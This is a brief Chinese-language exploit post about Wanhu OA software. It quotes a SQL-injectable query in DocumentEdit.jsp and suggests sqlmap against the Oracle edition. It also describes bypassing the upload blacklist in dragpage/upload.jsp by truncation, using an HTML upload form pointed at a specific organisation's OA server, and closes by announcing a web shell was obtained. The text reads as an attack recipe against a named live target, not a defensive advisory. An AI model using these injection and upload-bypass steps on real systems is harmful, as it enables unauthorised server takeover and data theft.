sql注入:
万户OA某处无限制sql注入 :http://www.2cto.com/Article/201409/332916.html
里面的方法适用于标准版,专业版存在同样的文件但是路径不一样。
defaultroot\iWebRevision.jsp\DocumentEdit.jsp
if (ObjConnBean.OpenConnection()) { System.out.println("OpenConnection"); String Sql="Select * From Document Where RecordID='"+ RecordID + "'"; ResultSet rs = null; rs = ObjConnBean.ExecuteQuery(Sql);
专业版使用的数据库是oracle所以poc不能用了,直接上sqlmap吧。
这样两个版本都通杀了,不知道这系统为什么要一个文件到处放。
文件上传:(这 漏洞 两个版本都适用的)
defaultroot/dragpage/upload. jsp
代码里是有过滤,但是看通过截断绕过setAllowedFilesList方法的黑名单限制
// Initialization mySmartUpload.initialize(pageContext); //mySmartUpload.setTotalMaxFileSize(100000); mySmartUpload.setAllowedFilesList("jpg,gif,bmp,swf,avi"); // Upload mySmartUpload.upload();
构造一个上传文件
<form id="frmUpload" enctype="multipart/form-data" action="http://oa.china-sss.com/defaultroot/dragpage/upload.jsp" method="post"> Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload">FileUpload </form>
然后抓包截断
shell到手~
查看更多关于万户OA某处绕过限制文件上传以及sql注入 - 网站安的详细内容...